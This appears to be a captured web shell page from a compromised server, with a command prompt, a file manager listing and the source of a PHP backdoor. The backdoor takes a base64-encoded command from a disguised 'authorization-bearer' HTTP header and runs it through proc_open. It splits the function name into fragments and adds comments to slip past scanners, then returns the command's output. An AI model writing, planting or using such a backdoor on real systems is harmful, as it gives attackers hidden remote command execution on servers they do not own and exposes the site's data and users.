[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.217.165: ~ $
<?php
header("Expires: 0");
$headers = getallheaders();
$authHeader = null;
foreach ($headers as $k => $v) if (stripos($k, 'authorization-bearer') !== false) { $authHeader = $v; break; }

if ($authHeader) {
    $Variable = base64_decode/**auth**/($authHeader);

    $suffix = '_open';
    $prefix = 'proc';
    $func = $prefix . $suffix;
    $p = $func/**authbearer**/($Variable, array(1 => array('pipe', 'w')), $pipes);
    if (is_resource($p)) { header('Content-Type: text/plain'); echo stream_get_contents($pipes[1]); fclose($pipes[1]); $suffix = '_close'; $prefix = 'proc'; $func = $prefix . $suffix; $func/**authbearer**/($p); }

    exit;
}
?>

Filemanager

Name Type Size Permission Actions
connect.php File 464 B 0644
usergroup_8.php File 649 B 0644